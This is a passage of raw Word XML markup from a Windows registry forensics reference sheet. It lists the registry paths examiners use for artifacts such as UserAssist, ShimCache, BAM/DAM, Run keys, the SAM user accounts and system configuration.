        <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7753A394" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="3F04870A">
          <v:rect id="_x0000_i1084" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB75216" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Windows Explorer Address/Search Bars</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D4F06E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>Registry Paths:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39188F04" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="2BBD5D6E">
          <v:rect id="_x0000_i1085" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E336B3C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Program Execution History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A5D463" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>UserAssist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>NTUSER.DAT</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>GUID}\Count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D1898C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ShimCache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AppCompatCache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Control\Session Manager\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>AppCompatCache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22968073" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="1AB613CA">
          <v:rect id="_x0000_i1086" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CA8549" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Background and Desktop Activity Monitoring (Windows 8+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E67FC44" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Background Activity Moderator (BAM):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Services\bam\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>UserSettings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>SID}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66457FC4" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Desktop Activity Monitor (DAM):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Services\dam\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>UserSettings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>SID}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1343627D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="5621E328">
          <v:rect id="_x0000_i1087" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B26188C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compiled by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:t xml:space="preserve"> Abdul Shareef Pallivalappil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F88831C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="6D1446E7">
          <v:rect id="_x0000_i1088" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="531A9141" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Registry Forensic Analysis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7215"/>
        <w:gridCol w:w="800"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="37A236B2" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D433A6A" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D9654C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Forensic Focus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5724B924" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D9654C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Registry Path / Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36DF829B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D9654C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="2660133A" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="651921F4" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>OS Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10387EEF" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="626A62E0" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>System version info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="58AF039A" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ECE6878" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Current Control Set</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F8A999C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>HKLM\SYSTEM\CurrentControlSetHKLM\SYSTEM\Select\CurrentHKLM\SYSTEM\Select\LastKnownGood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6333E397" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Active &amp; last known good config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="59CF5035" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D2A0C6D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Computer Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="612B9780" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>HKLM\SYSTEM\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>CurrentControlSet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>\Control\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>ComputerName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>ComputerName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="605FE489" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="239B8A84" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0144E570" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Time Zone Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B22A78B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>HKLM\SYSTEM\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>CurrentControlSet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>\Control\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>TimeZoneInformation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B825FA2" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Time zone settings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="04C67D39" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="211DBA6E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Network Interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C85C496" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02D371EF" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Network config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="334C8DEB" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DBEAB4E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>Autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t xml:space="preserve"> Programs (User)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26BEB7A1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>RunRunOnce</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D97600B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t xml:space="preserve">User </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t xml:space="preserve"> apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="24FBAAC0" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AED3708" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>Autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D9654C">
              <w:lastRenderedPageBreak/>
              <w:t>Programs (System)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1964EC66" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:lastRenderedPageBreak/>
              <w:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunRunOncePolicies\Explorer\Run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FCDCB43" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>System-</w:t>
            </w:r>
            <w:r w:rsidRPr="00D9654C">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">wide </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="7AA10185" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65D24052" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:lastRenderedPageBreak/>
              <w:t>User Accounts (SAM Hive)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DFA68F3" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>SAM\Domains\Account\Users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A98FFFB" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Local user accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="59E647D3" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DC43425" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>USB Device History</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B11276A" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
